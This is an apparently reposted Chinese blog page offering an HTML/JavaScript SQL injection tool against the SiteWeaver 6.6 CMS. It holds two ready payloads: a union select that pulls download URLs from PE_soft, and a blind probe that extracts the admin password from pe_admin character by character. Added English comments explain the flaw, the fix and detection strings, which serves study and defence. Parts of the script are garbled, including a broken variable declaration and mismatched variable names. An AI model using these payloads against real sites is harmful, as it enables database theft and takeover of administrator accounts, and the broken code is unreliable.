动易SiteWeaver6.6版最新漏洞利用工具

2009年11月24日星期二

动易SiteWeaver6.6版最新漏洞利用工具

作者:Cschii
来源:黑客防线

  1. <script> 
  /**
   * Decodes a raw HTTP response body into a JavaScript string (presumably from
   * GB2312, going by the function name). Internet Explorer only: it relies on
   * execScript and on the VBScript functions MidB and Chr.
   *
   * @param data raw response bytes; PostData passes oXmlHttp.responseBody
   * @returns the text produced by unescape() on the rebuilt escape sequence
   *
   * NOTE(review): the listing as captured here is not self-consistent (the split
   * result is stored in tt while the loop and the final join read t), so read it
   * as a record of the technique, not as runnable code.
   */
  2. function gb2utf8(data){  
      // Cache: four-character hex key -> escaped form of the converted character.
  3. var glbEncode = [];  
      // Assigned without var; presumably so the VBScript snippet below can reach it as a global.
  4. gb2utf8_data = data;  
  5. execScript("gb2utf8_data = MidB(gb2utf8_data, 1)", "VBScript");  
      // escape() the value, drop the "%u" markers, swap every pair of two-character groups,
      // then mark each "%XX%YY" whose first group starts with an uppercase letter with "@".
  6. var t=escape(gb2utf8_data).replace(/%u/g,"").replace(/(.{2})(.{2})/g,"%$2%$1").replace(/%([A-Z].)%(.{2})/g,"@$1$2");  
  7. tt=t.split("@");  
  8. var i=0,j=t.length,k;  
  9. while(++i<j) {  
  10. k=t[i].substring(0,4);  
  11. if(!glbEncode[k]) {  
      // NOTE(review): k is cut from the escaped response data, so response-derived text
      // reaches eval(); parseInt(k, 16) would parse the hex value without evaluating it.
  12. gb2utf8_char = eval("0x"+k);  
      // VBScript Chr() turns the numeric code into a character; characters 1..5 of its
      // escaped form are cached under k.
  13. execScript("gb2utf8_char = Chr(gb2utf8_char)", "VBScript");  
  14. glbEncode[k]=escape(gb2utf8_char).substring(1,6);  
  15. }  
  16. t[i]=glbEncode[k]+t[i].substring(4);  
  17. }  
      // Clear the two helper globals shared with the VBScript snippets.
  18. gb2utf8_data = gb2utf8_char = null;  
  19. return unescape(t.join("%"));  
  20. }  
  21.  
  /**
   * Sends the contents of the "post" field as a synchronous POST to the address in
   * the "url" field and writes the decoded response into the "getResult" field.
   * Uses ActiveXObject("Microsoft.XMLHTTP"), so it runs only in Internet Explorer.
   *
   * NOTE(review): the declaration of post (listing line 24) is garbled in this copy.
   */
  22. function PostData(){  
  23. var url = document.getElementById("url").value;  
  24. var postdocument.getElementById("post").value;  
  25. var oXmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  
      // Third argument false: the request is synchronous, send() blocks until it completes.
  26. oXmlHttp.open("POST", url, false);  
      // A form Content-Type is set only when the URL contains "User_CheckReg.asp";
      // any other request goes out without an explicit Content-Type from this code.
  27. if (url.indexOf("User_CheckReg.asp")>0){oXmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");}  
  28. oXmlHttp.send(post);  
      // The body is decoded before the status check; it is displayed only for readyState 4 and HTTP 200.
  29. var GetResult=gb2utf8(oXmlHttp.responseBody);  
  30. if (oXmlHttp.readyState == 4) {  
  31. if (oXmlHttp.status == 200) {  
  32. document.getElementById("getResult").value = GetResult;  
  33. }  
  34. }  
  35. }  
  /**
   * Fills the "url" and "post" fields with one of the page's two sample requests;
   * it sends nothing itself. i == 1 selects the Dyna_Page.asp sample, any other
   * value the User_CheckReg.asp sample. Both addresses point at 127.0.0.1:81.
   *
   * Defender's reading: in both samples a SQL fragment ("union select ...") sits
   * inside an ordinary request field - the <value> element of the XML body in the
   * first, the UserName form field in the second. Presumably the handlers build
   * their SQL statement by concatenating that field; the server-side remedy is to
   * bind these fields as query parameters and reject values of an unexpected type.
   *
   * Detection: where request bodies are logged or inspected, POSTs to these two
   * paths that contain "union select" or the table names PE_soft / pe_admin are
   * worth alerting on.
   */
  36. function Inject(i){  
  37. if (i==1){  
  38. document.getElementById("url").value="http://127.0.0.1:81/pe2006/Dyna_Page.asp";  
  39. document.getElementById("post").value='<?xml version="1.0" encoding="gb2312"?><root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root>';  
  40. }  
  41. else  
  42. {  
  43. document.getElementById("url").value="http://127.0.0.1:81/pe2006/Reg/User_CheckReg.asp";  
  44. document.getElementById("post").value="UserName=admino'%20union%20select%201%20from%20pe_admin%20where%20username='admin'band%20Mid(password,1,1)>'0";  
  45. }  
  46. }  
  47.  
  48. </script> 
  <!-- Test form: a URL field, a request-body field, three buttons (sample 1, submit, sample 2)
       and a result area. The defaults are the first sample request, addressed to 127.0.0.1:81. -->
  49. <BODY> 
  50. <div align="center">动易SiteWeaver6.6版最新漏洞利用工具</div> 
  51. 请输入URL:<br> 
  52. <INPUT TYPE="text" id="url" value="http://127.0.0.1:81/pe2006/Dyna_Page.asp" style="width:90%;">    <br> 
  53. 输入Post:<br> 
  54. <textArea id="post" style="width:90%; height:80;"><?xml version="1.0" encoding="gb2312"?> 
  55. <root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root></textArea> 
  56. <div align="center"><INPUT TYPE="button" value="漏洞一示例" onClick="Inject(1);">   <INPUT TYPE="button" value=" 提 交 " onClick="PostData();">   <INPUT TYPE="button" value="漏洞二示例" onClick="Inject(2);"></div> 
  57. <hr size=2 > 
  58. 注入结果:<br> 
  59. <textArea id="getResult" style="width:90%; height:200;"></textArea> 
  60. </BODY> 
From:http://www.sai52.com/archives/811/